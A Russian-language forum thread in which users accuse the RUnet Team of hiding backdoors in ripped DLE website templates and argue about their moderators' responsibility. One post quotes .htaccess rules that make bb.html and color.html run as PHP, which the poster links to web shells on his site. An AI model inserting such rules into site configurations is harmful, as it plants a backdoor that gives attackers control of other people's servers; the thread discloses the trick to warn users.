Black - RUnet Team

Статус
В этой теме нельзя размещать новые ответы.
Бугага, поржал, спасибо :D:D:D

добавить нечего) не знал, так не знал, просто второй шанс никто не даст наверно)
 
Оффтопик: я так понимаю, я отношусь к тому небольшому количеству дле-юзеров который перед установкой на рабочий сайт шаблона не лениться просмотреть весь код его и подправить от стучалок/бекдоров/линков? Я вот на вскидку не могу вспомнить ни 1 шаблона который сейчас у меня стоит чтоб там в начала небыло какой нибудь закладки.
 
Я уже давно писал про вредоносный код в шаблонах от рунеттим, просто сообщения кто-то затирал. в бан рунеттим
 
Я уже давно писал про вредоносный код в шаблонах от рунеттим, просто сообщения кто-то затирал. в бан рунеттим
Я уже говорил что этот топик первый описывает, тот код о котором даже я не знал. (читаем выше)
Остальные темы про код и расшифровку живы и не кто их не тер. (их как моря).

Читаем топик полностью и удаляем код.

Да и еще раз: Я не когда и не где не оправдывал шеллы в шаблонах.
 
  • Заблокирован
  • #15
Всем привет и всех с наступающим.
Итак что хотелось сказать по поводу барыг, крыс, кидал и.т.д…
Недавно столкнулся с ребятами которые занимаются этими вещами… что самое плохое они находятся и в клубе и модераторы…
Все мы знает RUnet Team группу по созданию Rip’ов шаблонов для DLE.
Они конечно отлично рипают и немного добавляют своего года как например:
PHP:
Order Deny,Allow
Allow from all
<FilesMatch "^(bb)\.html$">
  ForceType application/x-httpd-php
</FilesMatch>
и потом выполняется файл bb.html (который закоден)
сам шабик лежит тут Для просмотра ссылки Войди или Зарегистрируйся
дальше специльно рипали для меня
Для просмотра ссылки Войди или Зарегистрируйся
за, что сначало был очень благодарен пока сегдоня не обнаружил шеллы на сайте и файлик который находился в рипнутом шаблоне color.html
и файл .htaccess с добавлением :
PHP:
Order Deny,Allow
Allow from all
<FilesMatch "^(color)\.html$">
  ForceType application/x-httpd-php
</FilesMatch>
Я одного не понимаю для чего это делается ? Траф погонять , много наработали ?
Так же сюда же Для просмотра ссылки Войди или Зарегистрируйся
Вообще кто скачал их шаблоны проверяйте на шеллы, на подозрительные файлы, вот такие сейчас бывают люди.
От себя ещё добавлю,CheburatoR-all вообще я такого от тебя не ожидал.
И правда, такое лучше под хайд сувать ;) Хотя бы 100..... То сейчас начнут появляться рипы...

Хехехе
 
Последствий у кода никаких нет? Я имею в виду, может он портит какие-нибудь другие файлы движка? Больше ничего чистить ненадо?
 
Вамирчег релакс, они хорошие и безвредные, по крайней мере для меня и комманды nws :)
 
Вамирчег релакс, они хорошие и безвредные, по крайней мере для меня и комманды nws :)
Не охота щас говорить матом. Считаешь так, удачи.

Добавлено через 36 минут
Только пиии люди которые скачали тот или иной шаблон что с**а ты пиии ты думаешь им сказать !
Всё пиии ? да пиии на нуледе 181,029 пользователей, скачало 1 шаблон 100 человек, второй 200, 3й 300!

Суть в том , что удар сказывается не на таких как ты , а на статус смотришь и думаешь он модератор, доверие, его выбрали люди хозяева проекта, подставлять их таким образом это вообще не понимаю, и им тоже не приятно.

Делайте что хотите, думал сделать на новый год много всего, но увы,
больше с паблик писать не буду.
 
Вамирчег релакс, они хорошие и безвредные, по крайней мере для меня и комманды nws :)

Якобы шеллы они тоже безвредные позаливали? :confused:
Можно много чего сказать, но все и так написано выше + общее настроение.

2 CheburatoR-all, даже если ты ничего действительно не знал, - но за такую оплошность.., как сказал мефиш, он ведь действительно прав, люди жестоки по своей природе, и 2 шанса обычно не дают.
С другой стороны, как-то странно, ты, создатель команды (что я прочел на вашем форуме), и не знаешь что у вас творится? Конечно, в фирме которую "придавили" верхушка пытается сделать крайним кого-то из работников, но на самом деле спрашивают с главных ведь?
Нужно иметь мужество признать то что случилось, и то что будет, а не говорить, вот так вот просто, "Да пошли они, я что-то подозревал - теперь я не в тиме".

Очень мягко говоря, все складывается очень не красиво, а в три раза хуже то, что пострадал и заметил человек, который никому никогда в помощи не отказывал, добрая душа в общем.

Пока все, а то морально подавлен. Казалось бы, семья нулледа, а такое творят + ставят все остальное комьюнити в плохом свете :(
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху